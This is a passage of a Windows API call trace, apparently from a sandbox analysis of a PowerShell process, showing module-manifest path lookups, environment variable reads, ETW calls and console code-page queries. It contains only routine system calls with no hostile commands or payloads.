lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ScheduledTasks\\ScheduledTasks.psd1", lpFilePart=0x0) returned 0x55 [0286.646] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7ef50 [0286.646] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7ef50, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.646] CoTaskMemFree (pv=0x25b73f7ef50) [0286.646] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ScheduledTasks\\ScheduledTasks.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ScheduledTasks\\ScheduledTasks.psd1", lpFilePart=0x0) returned 0x55 [0286.647] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SecureBoot\\SecureBoot.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SecureBoot\\SecureBoot.psd1", lpFilePart=0x0) returned 0x4d [0286.647] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f819d0 [0286.647] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f819d0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.647] CoTaskMemFree (pv=0x25b73f819d0) [0286.647] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SecureBoot\\SecureBoot.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SecureBoot\\SecureBoot.psd1", lpFilePart=0x0) returned 0x4d [0286.647] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare\\SmbShare.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare\\SmbShare.psd1", lpFilePart=0x0) returned 0x49 [0286.647] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7e4b0 [0286.647] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7e4b0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.647] CoTaskMemFree (pv=0x25b73f7e4b0) [0286.647] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare\\SmbShare.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare\\SmbShare.psd1", lpFilePart=0x0) returned 0x49 [0286.647] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\SmbWitness.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\SmbWitness.psd1", lpFilePart=0x0) returned 0x4d [0286.647] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7f170 [0286.647] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7f170, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.648] CoTaskMemFree (pv=0x25b73f7f170) [0286.648] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\SmbWitness.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\SmbWitness.psd1", lpFilePart=0x0) returned 0x4d [0286.648] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\StartLayout.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\StartLayout.psd1", lpFilePart=0x0) returned 0x4f [0286.648] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7e290 [0286.648] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7e290, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.648] CoTaskMemFree (pv=0x25b73f7e290) [0286.648] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\StartLayout.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\StartLayout.psd1", lpFilePart=0x0) returned 0x4f [0286.648] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage\\Storage.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage\\Storage.psd1", lpFilePart=0x0) returned 0x47 [0286.648] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f83790 [0286.648] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f83790, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.648] CoTaskMemFree (pv=0x25b73f83790) [0286.648] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage\\Storage.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage\\Storage.psd1", lpFilePart=0x0) returned 0x47 [0286.648] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\TLS\\TLS.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\TLS\\TLS.psd1", lpFilePart=0x0) returned 0x3f [0286.648] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f80270 [0286.648] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f80270, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.648] CoTaskMemFree (pv=0x25b73f80270) [0286.649] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\TLS\\TLS.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\TLS\\TLS.psd1", lpFilePart=0x0) returned 0x3f [0286.649] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", lpFilePart=0x0) returned 0x5f [0286.649] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7e4b0 [0286.649] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7e4b0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.649] CoTaskMemFree (pv=0x25b73f7e4b0) [0286.649] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", lpFilePart=0x0) returned 0x5f [0286.649] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\TrustedPlatformModule\\TrustedPlatformModule.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\TrustedPlatformModule\\TrustedPlatformModule.psd1", lpFilePart=0x0) returned 0x63 [0286.649] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f82f10 [0286.649] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f82f10, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.649] CoTaskMemFree (pv=0x25b73f82f10) [0286.649] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\TrustedPlatformModule\\TrustedPlatformModule.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\TrustedPlatformModule\\TrustedPlatformModule.psd1", lpFilePart=0x0) returned 0x63 [0286.649] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\VpnClient\\VpnClient.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\VpnClient\\VpnClient.psd1", lpFilePart=0x0) returned 0x4b [0286.649] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f819d0 [0286.649] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f819d0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.649] CoTaskMemFree (pv=0x25b73f819d0) [0286.649] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\VpnClient\\VpnClient.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\VpnClient\\VpnClient.psd1", lpFilePart=0x0) returned 0x4b [0286.650] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Wdac\\Wdac.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Wdac\\Wdac.psd1", lpFilePart=0x0) returned 0x41 [0286.650] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f82ad0 [0286.650] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f82ad0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.650] CoTaskMemFree (pv=0x25b73f82ad0) [0286.650] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Wdac\\Wdac.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Wdac\\Wdac.psd1", lpFilePart=0x0) returned 0x41 [0286.650] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\WindowsDeveloperLicense\\WindowsDeveloperLicense.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\WindowsDeveloperLicense\\WindowsDeveloperLicense.psd1", lpFilePart=0x0) returned 0x67 [0286.650] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f819d0 [0286.650] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f819d0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.650] CoTaskMemFree (pv=0x25b73f819d0) [0286.650] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\WindowsDeveloperLicense\\WindowsDeveloperLicense.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\WindowsDeveloperLicense\\WindowsDeveloperLicense.psd1", lpFilePart=0x0) returned 0x67 [0286.650] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\WindowsErrorReporting\\WindowsErrorReporting.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\WindowsErrorReporting\\WindowsErrorReporting.psd1", lpFilePart=0x0) returned 0x63 [0286.650] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7e8f0 [0286.650] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7e8f0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.650] CoTaskMemFree (pv=0x25b73f7e8f0) [0286.650] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\WindowsErrorReporting\\WindowsErrorReporting.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\WindowsErrorReporting\\WindowsErrorReporting.psd1", lpFilePart=0x0) returned 0x63 [0286.651] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\WindowsSearch\\WindowsSearch.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\WindowsSearch\\WindowsSearch.psd1", lpFilePart=0x0) returned 0x53 [0286.651] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7f9f0 [0286.651] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7f9f0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.651] CoTaskMemFree (pv=0x25b73f7f9f0) [0286.651] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\WindowsSearch\\WindowsSearch.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\WindowsSearch\\WindowsSearch.psd1", lpFilePart=0x0) returned 0x53 [0286.651] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\WindowsUpdate\\WindowsUpdate.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\WindowsUpdate\\WindowsUpdate.psd1", lpFilePart=0x0) returned 0x53 [0286.651] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7e070 [0286.651] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7e070, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.651] CoTaskMemFree (pv=0x25b73f7e070) [0286.651] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\WindowsUpdate\\WindowsUpdate.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\WindowsUpdate\\WindowsUpdate.psd1", lpFilePart=0x0) returned 0x53 [0286.651] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0286.651] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7e8f0 [0286.651] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7e8f0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.651] CoTaskMemFree (pv=0x25b73f7e8f0) [0286.651] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0286.651] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0286.652] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7d5d0 [0286.652] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7d5d0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.652] CoTaskMemFree (pv=0x25b73f7d5d0) [0286.652] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0286.652] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0286.652] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f82690 [0286.652] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f82690, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.652] CoTaskMemFree (pv=0x25b73f82690) [0286.652] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0286.652] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0286.652] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f82cf0 [0286.652] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f82cf0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.652] CoTaskMemFree (pv=0x25b73f82cf0) [0286.652] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0286.653] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8d7c8 | out: lpConsoleScreenBufferInfo=0x653ef8d7c8) returned 1 [0286.663] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8d7c8 | out: lpConsoleScreenBufferInfo=0x653ef8d7c8) returned 1 [0286.736] EtwEventActivityIdControl () returned 0x0 [0286.736] EtwEventActivityIdControl () returned 0x0 [0286.736] EtwEventActivityIdControl () returned 0x0 [0286.736] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f819d0 [0286.736] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x25b73f819d0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.736] CoTaskMemFree (pv=0x25b73f819d0) [0286.737] EtwEventActivityIdControl () returned 0x0 [0286.737] EtwEventActivityIdControl () returned 0x0 [0286.737] EtwEventActivityIdControl () returned 0x0 [0286.737] EtwEventActivityIdControl () returned 0x0 [0286.737] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xa18 [0286.738] EtwEventActivityIdControl () returned 0x0 [0286.738] EtwEventActivityIdControl () returned 0x0 [0286.738] EtwEventActivityIdControl () returned 0x0 [0286.738] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f82690 [0286.738] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x25b73f82690, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.738] CoTaskMemFree (pv=0x25b73f82690) [0286.738] EtwEventActivityIdControl () returned 0x0 [0286.738] EtwEventActivityIdControl () returned 0x0 [0286.738] EtwEventActivityIdControl () returned 0x0 [0286.739] EtwEventActivityIdControl () returned 0x0 [0287.067] EtwEventActivityIdControl () returned 0x0 [0287.067] EtwEventActivityIdControl () returned 0x0 [0287.067] EtwEventActivityIdControl () returned 0x0 [0287.067] EtwEventActivityIdControl () returned 0x0 [0287.068] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef875e8 | out: lpConsoleScreenBufferInfo=0x653ef875e8) returned 1 [0287.069] EtwEventActivityIdControl () returned 0x0 [0287.069] EtwEventActivityIdControl () returned 0x0 [0287.069] EtwEventActivityIdControl () returned 0x0 [0287.069] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7f390 [0287.069] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x25b73f7f390, nSize=0x105 | out: lpBuffer="") returned 0x0 [0287.069] CoTaskMemFree (pv=0x25b73f7f390) [0287.069] EtwEventActivityIdControl () returned 0x0 [0287.069] EtwEventActivityIdControl () returned 0x0 [0287.069] EtwEventActivityIdControl () returned 0x0 [0287.070] EtwEventActivityIdControl () returned 0x0 [0287.070] EtwEventActivityIdControl () returned 0x0 [0287.070] EtwEventActivityIdControl () returned 0x0 [0287.072] EtwEventActivityIdControl () returned 0x0 [0287.072] EtwEventActivityIdControl () returned 0x0 [0287.072] EtwEventActivityIdControl () returned 0x0 [0287.072] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7c6f0 [0287.072] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x25b73f7c6f0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0287.073] CoTaskMemFree (pv=0x25b73f7c6f0) [0287.073] EtwEventActivityIdControl () returned 0x0 [0287.073] EtwEventActivityIdControl () returned 0x0 [0287.073] EtwEventActivityIdControl () returned 0x0 [0287.073] EtwEventActivityIdControl () returned 0x0 [0287.073] EtwEventActivityIdControl () returned 0x0 [0287.073] EtwEventActivityIdControl () returned 0x0 [0287.409] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88158 | out: lpConsoleScreenBufferInfo=0x653ef88158) returned 1 [0287.410] GetConsoleOutputCP () returned 0x1b5 [0287.411] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.421] GetConsoleOutputCP () returned 0x1b5 [0287.421] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.421] GetConsoleOutputCP () returned 0x1b5 [0287.442] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.442] GetConsoleOutputCP () returned 0x1b5 [0287.442] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.442] GetConsoleOutputCP () returned 0x1b5 [0287.443] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.443] GetConsoleOutputCP () returned 0x1b5 [0287.443] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.443] GetConsoleOutputCP () returned 0x1b5 [0287.443] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.443] GetConsoleOutputCP () returned 0x1b5 [0287.444] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.444] GetConsoleOutputCP () returned 0x1b5 [0287.444] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.444] GetConsoleOutputCP () returned 0x1b5 [0287.445] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.445] GetConsoleOutputCP () returned 0x1b5 [0287.445] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.445] GetConsoleOutputCP () returned 0x1b5 [0287.445] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.445] GetConsoleOutputCP () returned 0x1b5 [0287.446] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.446] GetConsoleOutputCP () returned 0x1b5 [0287.446] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.446] GetConsoleOutputCP () returned 0x1b5 [0287.447] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.447] GetConsoleOutputCP () returned 0x1b5 [0287.447] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.447] GetConsoleOutputCP () returned 0x1b5 [0287.447] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.448] GetConsoleOutputCP () returned 0x1b5 [0287.448] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.448] GetConsoleOutputCP () returned 0x1b5 [0287.448] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.448] GetConsoleOutputCP () returned 0x1b5 [0287.449] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.449] GetConsoleOutputCP () returned 0x1b5 [0287.449] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.449] GetConsoleOutputCP () returned 0x1b5 [0287.449] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.450] GetConsoleOutputCP () returned 0x1b5 [0287.450] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.450] GetConsoleOutputCP () returned 0x1b5 [0287.450] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 